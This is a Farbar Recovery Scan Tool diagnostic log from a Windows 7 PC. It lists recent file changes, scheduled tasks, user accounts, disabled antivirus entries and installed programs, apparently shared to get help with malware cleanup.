2019-11-18 21:23 - 2019-11-18 21:23 - 000001001 _____ C:\Users\Vladana\Desktop\iPool.lnk
2019-11-18 14:24 - 2019-11-19 15:31 - 000000000 ____D C:\FRST
2019-11-18 14:22 - 2019-11-18 14:52 - 002260480 _____ (Farbar) C:\Users\Vladana\Desktop\FRST64.exe
2019-11-16 17:33 - 2019-11-16 17:45 - 000000000 ____D C:\Users\Vladana\AppData\Local\CrashDumps
2019-11-16 16:40 - 2019-11-18 19:26 - 000000000 ____D C:\ProgramData\Hotspot Shield
2019-11-16 16:39 - 2019-11-16 16:39 - 000000000 ____D C:\Users\Vladana\AppData\Local\Turbo.net
2019-11-16 16:21 - 2019-11-16 16:21 - 000000000 ____D C:\Users\Vladana\Documents\Visual Studio 2005
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\Users\Public\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\ProgramData\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 14:14 - 2019-11-16 14:14 - 000001216 _____ C:\Users\Vladana\Desktop\4K Video Downloader.lnk
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\4K Video Downloader
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Local\4kdownload.com
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Program Files (x86)\4KDownload
2019-11-15 19:03 - 2019-11-17 00:15 - 000000000 ____D C:\Users\Vladana\AppData\Local\ZenMate
2019-11-11 01:34 - 2019-11-19 14:45 - 000003348 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-11 01:34 - 2019-11-19 14:45 - 000003218 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-08 21:02 - 2019-11-11 01:28 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\Users\Public\Desktop\Mp3tag.lnk
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\ProgramData\Desktop\Mp3tag.lnk
 
==================== One month (modified) ==================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-19 15:28 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-11-19 15:28 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-11-19 15:25 - 2018-07-17 21:31 - 000000000 ____D C:\Users\Vladana\AppData\Local\AVAST Software
2019-11-19 15:22 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-19 14:43 - 2015-04-11 19:53 - 000000000 ____D C:\Windows\pss
2019-11-19 11:10 - 2014-10-19 23:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\vlc
2019-11-18 19:45 - 2013-03-19 22:08 - 000746014 _____ C:\Windows\system32\perfh00C.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000740656 _____ C:\Windows\system32\perfh015.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000714178 _____ C:\Windows\system32\prfh0416.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000684052 _____ C:\Windows\system32\perfh00E.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000607286 _____ C:\Windows\system32\perfh008.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000494812 _____ C:\Windows\system32\perfh014.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000479312 _____ C:\Windows\system32\perfh001.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000417076 _____ C:\Windows\system32\perfh011.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000171600 _____ C:\Windows\system32\perfc00E.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000156198 _____ C:\Windows\system32\perfc015.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000149906 _____ C:\Windows\system32\perfc00C.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000147982 _____ C:\Windows\system32\prfc0416.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000122426 _____ C:\Windows\system32\perfc011.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000111454 _____ C:\Windows\system32\perfc008.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000095730 _____ C:\Windows\system32\perfc014.dat
2019-11-18 19:45 - 2013-03-19 22:08 - 000095098 _____ C:\Windows\system32\perfc001.dat
2019-11-18 19:45 - 2013-03-19 15:24 - 000481800 _____ C:\Windows\system32\perfh00B.dat
2019-11-18 19:45 - 2013-03-19 15:24 - 000101846 _____ C:\Windows\system32\perfc00B.dat
2019-11-18 19:45 - 2009-07-14 06:13 - 007211860 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-18 19:45 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2019-11-18 19:28 - 2013-02-21 15:11 - 000000000 ____D C:\Program Files (x86)\Nokia
2019-11-18 13:46 - 2017-09-05 15:33 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mp3tag
2019-11-17 22:16 - 2013-02-21 01:36 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Azureus
2019-11-17 02:16 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2019-11-16 17:47 - 2019-05-23 11:52 - 000003160 _____ C:\Windows\system32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389}
2019-11-16 17:47 - 2018-09-06 18:23 - 000003334 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2019-11-16 17:47 - 2018-09-06 18:23 - 000003206 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2019-11-16 17:47 - 2018-03-14 03:40 - 000004470 _____ C:\Windows\system32\Tasks\Adobe Flash Player NPAPI Notifier
2019-11-16 17:47 - 2016-03-23 08:37 - 000003052 _____ C:\Windows\system32\Tasks\SafeZone scheduled Autoupdate 1458718670
2019-11-16 17:47 - 2016-01-03 12:45 - 000003652 _____ C:\Windows\system32\Tasks\DivXUpdate
2019-11-16 17:47 - 2015-12-03 22:42 - 000000000 ____D C:\Windows\system32\Tasks\AVAST Software
2019-11-16 17:47 - 2015-06-10 12:59 - 000004458 _____ C:\Windows\system32\Tasks\Adobe Flash Player PPAPI Notifier
2019-11-16 17:47 - 2015-06-10 12:47 - 000003850 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1433936833
2019-11-16 17:47 - 2015-02-06 11:56 - 000003432 _____ C:\Windows\system32\Tasks\RealDownloader Update Check
2019-11-16 17:47 - 2015-01-06 11:27 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2019-11-16 17:47 - 2014-07-14 00:42 - 000003226 _____ C:\Windows\system32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C}
2019-11-16 17:47 - 2013-02-28 00:53 - 000003390 _____ C:\Windows\system32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-16 17:47 - 2013-02-21 21:07 - 000003508 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA
2019-11-16 17:47 - 2013-02-21 21:07 - 000003236 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core
2019-11-16 17:47 - 2013-02-20 22:41 - 000004312 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2019-11-16 17:46 - 2019-05-23 15:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2019-11-16 16:21 - 2013-02-20 22:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\Microsoft Help
2019-11-16 15:55 - 2014-08-18 11:50 - 000000000 ____D C:\Program Files (x86)\Freemake
2019-11-16 14:54 - 2017-07-25 15:43 - 000000000 ____D C:\Users\Vladana\AppData\Local\FreemakeVideoConverter
2019-11-16 14:54 - 2014-08-18 11:50 - 000000000 ____D C:\ProgramData\Freemake
2019-11-16 13:48 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ZenGuard GmbH
2019-11-15 19:04 - 2017-08-25 02:23 - 000000000 ____D C:\Users\Vladana\AppData\Local\SquirrelTemp
2019-11-15 17:02 - 2013-02-20 21:51 - 000000000 ____D C:\Users\Vladana\AppData\Local\Google
2019-11-13 21:40 - 2013-02-20 22:41 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2019-11-13 21:40 - 2013-02-20 22:41 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2019-11-13 21:40 - 2013-02-20 22:41 - 000000000 ____D C:\Windows\system32\Macromed
2019-11-11 15:42 - 2016-09-25 12:57 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Apowersoft
2019-11-11 01:33 - 2017-03-14 00:19 - 000004168 _____ C:\Windows\system32\Tasks\Avast Emergency Update
2019-11-11 01:28 - 2013-02-20 21:52 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2019-11-09 12:32 - 2017-04-16 10:33 - 000000000 ____D C:\Users\Vladana\AppData\LocalLow\Mozilla
2019-11-08 01:14 - 2018-09-06 18:24 - 000002184 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-11-08 01:14 - 2018-09-06 18:24 - 000002143 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2019-11-07 18:44 - 2015-06-10 12:47 - 000000000 ____D C:\Program Files (x86)\Opera
2019-11-06 11:30 - 2016-09-05 13:58 - 000001271 _____ C:\Users\Vladana\Desktop\marker.txt
2019-11-05 05:03 - 2013-02-20 21:52 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Mozilla
2019-11-05 00:06 - 2015-10-15 21:00 - 000000000 ____D C:\Program Files (x86)\Google
2019-10-22 01:05 - 2017-09-05 14:37 - 000000000 ____D C:\Program Files (x86)\Mp3tag
 
==================== Files in the root of some directories ========
 
2013-04-12 20:07 - 2014-11-17 02:37 - 000000580 _____ () C:\Users\Vladana\AppData\Roaming\AutoGK.ini
2013-03-15 02:55 - 2014-11-18 03:36 - 000010752 _____ () C:\Users\Vladana\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-05-19 01:43 - 2015-05-19 01:43 - 000247298 _____ () C:\Users\Vladana\AppData\Local\Tempdivx84f8
2015-07-02 22:06 - 2015-07-02 22:06 - 000043682 _____ () C:\Users\Vladana\AppData\Local\Tempdivxffab
 
==================== SigCheck ============================
 
(There is no automatic fix for files that do not pass verification.)
 
 
LastRegBack: 2019-11-19 02:30
==================== End of FRST.txt ========================
 
 
Copy of Addition.txt:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-11-2019
Ran by Vladana (19-11-2019 15:33:16)
Running from C:\Users\Vladana\Desktop
Windows 7 Ultimate (X64) (2013-02-20 19:53:32)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-7682389-3612777877-391866582-500 - Administrator - Disabled)
Guest (S-1-5-21-7682389-3612777877-391866582-501 - Limited - Disabled)
Vladana (S-1-5-21-7682389-3612777877-391866582-1000 - Administrator - Enabled) => C:\Users\Vladana
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avast Antivirus (Disabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Disabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4K Video Downloader (HKLM-x32\...\4K Video Downloader) (Version:  - Open Media LLC)
ACDSee 10 Photo Manager (HKLM-x32\...\{F8B98EB6-FC06-45BF-87D4-9784E0408611}) (Version: 10.0.219 - ACD Systems International)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20063 - Adobe Systems Incorporated)
Adobe Flash Player 32 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Flash Player 32 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 32.0.0.293 - Adobe)
Adobe Shockwave Player 12.3 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.3.4.204 - Adobe Systems, Inc.)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version:  - ALPS ELECTRIC CO., LTD.)
Apowersoft Online Launcher version 1.6.1 (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{20BF67A8-D81A-4489-8225-FABAA0896E2D}_is1) (Version: 1.6.1 - APOWERSOFT LIMITED)
Auto Gordian Knot 2.55 (HKLM-x32\...\AutoGK) (Version: 2.55 - len0x)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 19.8.2393 - AVAST Software)
AVI ReComp 1.5.5 (HKLM-x32\...\AVI ReComp) (Version: 1.5.5 - Mateusz Gola (aka Prozac))
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Awesomium.NET Redistribution Module (HKLM-x32\...\{C34CAF35-6198-4EEB-970F-C61FC51D23BD}) (Version: 1.7.4.2 - ©2014 Awesomium Technologies LLC) Hidden
Bigasoft Total Video Converter 3.7.24.4700 (HKLM-x32\...\{a72ce741-1f32-4d79-bffb-a714375c678d}_is1) (Version:  - Bigasoft Corporation)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DivX Setup (HKLM\...\DivX Setup) (Version: 10.8.7.0 - DivX, LLC)
FileLab Plugin 1.1.33 (HKLM-x32\...\{6AC5F630-9453-433D-90FF-BB3A8E4F8960}) (Version: 1.1.33 - FileLab)
FJ Camera (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.52032.0_WHQL - Sonix)
Freemake Video Converter version 4.1.10 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.10 - Mixbyte Inc.)
Fujitsu Hotkey Utility (HKLM-x32\...\{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED) Hidden
Fujitsu Hotkey Utility (HKLM-x32\...\InstallShield_{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED)
Fujitsu MobilityCenter Extension Utility (HKLM\...\{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED) Hidden
Fujitsu MobilityCenter Extension Utility (HKLM-x32\...\InstallShield_{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 4.01.00.000 - FUJITSU LIMITED)
Fujitsu System Extension Utility (HKLM\...\{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED) Hidden
Fujitsu System Extension Utility (HKLM-x32\...\InstallShield_{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 78.0.3904.97 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.341 - Google LLC) Hidden
Google Video Support Plugin (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 19.11.1800.0 - Google, LLC.)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2696 - Intel Corporation)
Intel® PROSet/Wireless for Bluetooth® + High Speed (HKLM\...\{705EE775-5776-48FD-B704-C3C9CF535420}) (Version: 15.1.1.0170 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{F0932859-AA60-459E-B843-0BDECA34E2C7}) (Version: 2.0.0.0086 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.0.0.1032 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{BAA0BE9B-9E6D-4802-91CB-FB7ED5CD4BEF}) (Version: 15.01.1500.1034 - Intel Corporation)
iPool (HKLM-x32\...\iPool) (Version: 2.2.03 - Memir Games)
iSnooker 2.2.60 (HKLM-x32\...\isnooker_memir_is1) (Version: 2.2.60 - Memir Games Ltd)
Java 8 Update 221 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180221F0}) (Version: 8.0.2210.11 - Oracle Corporation)
KeepVid Pro(Build 6.3.2.0) (HKLM-x32\...\KeepVid Pro_is1) (Version: 6.3.2.0 - KeepVid Studio)
LIFEBOOK Application Panel (HKLM\...\{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED) Hidden
LIFEBOOK Application Panel (HKLM-x32\...\InstallShield_{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED)
Malwarebytes version 3.4.5.2467 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.4.5.2467 - Malwarebytes)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs (HKLM-x32\...\{90120000-00B2-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\SkyDriveSetup.exe) (Version: 17.0.2006.0314 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{5BABDA39-61CF-41EE-992D-4054B6649A9B}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{ED6C77F9-4D7E-447C-9EC0-9A212D075535}) (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 70.0.1.7242 - Mozilla)
Mp3tag v2.99a (HKLM-x32\...\Mp3tag) (Version: 2.99a - Florian Heidenreich)
MSVC80_x64_v2 (HKLM\...\{4D668D4F-FAA2-4726-834C-31F4614F312E}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC80_x86_v2 (HKLM-x32\...\{6D3245B1-8DB8-4A23-9CD2-2C90F40ABAF6}) (Version: 1.0.3.0 - Nokia) Hidden
MSVC90_x64 (HKLM\...\{AB071C8B-873C-459F-ACA9-9EBE03C3E89B}) (Version: 1.0.1.2 - Nokia) Hidden
MSVC90_x86 (HKLM-x32\...\{AF111648-99A1-453E-81DD-80DBBF6DAD0D}) (Version: 1.0.1.2 - Nokia) Hidden
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Noise Reduction Plug-In 2.0 (HKLM-x32\...\{B94515E1-2DD6-11E2-849E-F04DA23A5C58}) (Version: 2.0.515 - Sony)
Nokia Connectivity Cable Driver (HKLM-x32\...\{29373274-977E-413C-A4DE-DC0F8E80C429}) (Version: 7.1.172.0 - Nokia)
Nokia Software Updater (HKLM-x32\...\{7130468A-F53F-4698-8C09-A339EA3B05E6}) (Version: 3.0.655 - Nokia)
Nokia Suite (HKLM-x32\...\{88B6F9DE-C80F-4A70-ACF6-BEE933679170}) (Version: 3.8.54.0 - Nokia) Hidden
Nokia Suite (HKLM-x32\...\Nokia Suite) (Version: 3.8.54.0 - Nokia)
Opera Stable 64.0.3417.92 (HKLM-x32\...\Opera 64.0.3417.92) (Version: 64.0.3417.92 - Opera Software)
PC Connectivity Solution (HKLM-x32\...\{6D01D1B1-17BD-4F10-BB11-F08F0C47D42B}) (Version: 12.0.109.0 - Nokia)
PeaZip 5.2.0 (HKLM-x32\...\{5A2BC38A-406C-4A5B-BF45-6991F9A05325}_is1) (Version:  - Giorgio Tani)
Plugfree NETWORK (HKLM\...\{7BA64D21-EE46-4a9a-8145-52B0175C3F86}) (Version: 6.2.0.1 - FUJITSU LIMITED)
Plugfree NETWORK (HKLM\...\{E1C056BE-ACC9-4FCF-B37D-55A46648B369}) (Version: 6.2.001 - FUJITSU LIMITED) Hidden
Power Saving Utility (HKLM-x32\...\{49A588CF-5FD4-4774-BFBF-0764287DE82B}) (Version: 32.01.10.043 - FUJITSU LIMITED)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RealDownloader (HKLM-x32\...\{6FCD4D5A-20B9-4D79-ABA5-4E7048944025}) (Version: 17.0.15.4 - RealNetworks, Inc.) Hidden
RealDownloader (HKLM-x32\...\{e6171278-8759-449d-9e0b-c1825debc2ad}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealDownloader (HKLM-x32\...\{FBEFDC9E-F8FB-4B66-A78B-09B7B380D59D}) (Version: 17.0.15.7 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (HKLM-x32\...\{7770E71B-2D43-4800-9CB3-5B6CAAEBEBEA}) (Version: 9.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM\...\{21E47F47-C9A7-4454-BA48-388327B0EA00}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (HKLM-x32\...\{AAECF7BA-E83B-4A10-87EA-DE0B333F8734}) (Version: 10.0 - RealNetworks, Inc) Hidden
RealPlayer Cloud (HKLM-x32\...\RealPlayer 17.0) (Version: 17.0.15 - RealNetworks)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.53.216.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6526 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30129 - Realtek Semiconductor Corp.)
RealUpgrade 1.1 (HKLM-x32\...\{28C2DED6-325B-4CC7-983A-1777C8F7FBAB}) (Version: 1.1.0 - RealNetworks, Inc.) Hidden
SafeZone Stable 1.48.2066.44 (HKLM-x32\...\SafeZone 1.48.2066.44) (Version: 1.48.2066.44 - Avast Software) Hidden
SolveigMM AVI Trimmer (HKLM-x32\...\SolveigMM AVI Trimmer 2.0.1210.11) (Version: 2.0.1210.11 - Solveig Multimedia)
Sound Forge Pro 10.0 (HKLM-x32\...\{8EF5E2B0-2DD1-11E2-89A5-F04DA23A5C58}) (Version: 10.0.507 - Sony)
Spotify (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Spotify) (Version: 1.1.8.439.g8502297d - Spotify AB)
Subtitle Edit 3.4.3 (HKLM-x32\...\SubtitleEdit_is1) (Version: 3.4.3.0 - Nikse)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Total Commander (Remove or Repair) (HKLM-x32\...\Totalcmd) (Version:  - )
Unity Web Player (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
UpdateService (HKLM-x32\...\{E3AE96D6-E196-45B4-AF62-2B41998B9E37}) (Version: 1.0.0 - RealNetworks, Inc.) Hidden
VC80CRTRedist - 8.0.50727.6195 (HKLM-x32\...\{933B4015-4618-4716-A828-5289FC03165F}) (Version: 1.2.0 - DivX, Inc) Hidden
VCRedistSetup (HKLM-x32\...\{3921A67A-5AB1-4E48-9444-C71814CF3027}) (Version: 1.0.0 - Nero AG) Hidden
Video Download Capture version 6.2.8 (HKLM-x32\...\{b3336f66-e079-4ff6-abdb-51e2fab781d5}_is1) (Version: 6.2.8 - APOWERSOFT LIMITED)
Video Downloader (HKLM-x32\...\{62796191-6F12-4ABE-BA8B-B4D4A266C997}) (Version: 1.0.0 - RealNetworks) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VobSub v2.23 (Remove Only) (HKLM-x32\...\VobSub) (Version:  - )
Vuze (HKLM-x32\...\8461-7759-5462-8226) (Version: 5.7.6.0 - Azureus Software, Inc.)
Winamp (HKLM-x32\...\Winamp) (Version: 5.623  - Nullsoft, Inc)
Winamp Detector Plug-in (HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
Windows Driver Package - Nokia pccsmcfd LegacyDriver  (05/31/2012 7.1.2.0) (HKLM\...\62BBD193ADFDBB228C7E1ADB56463F5732FF7F6F) (Version: 05/31/2012 7.1.2.0 - Nokia)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
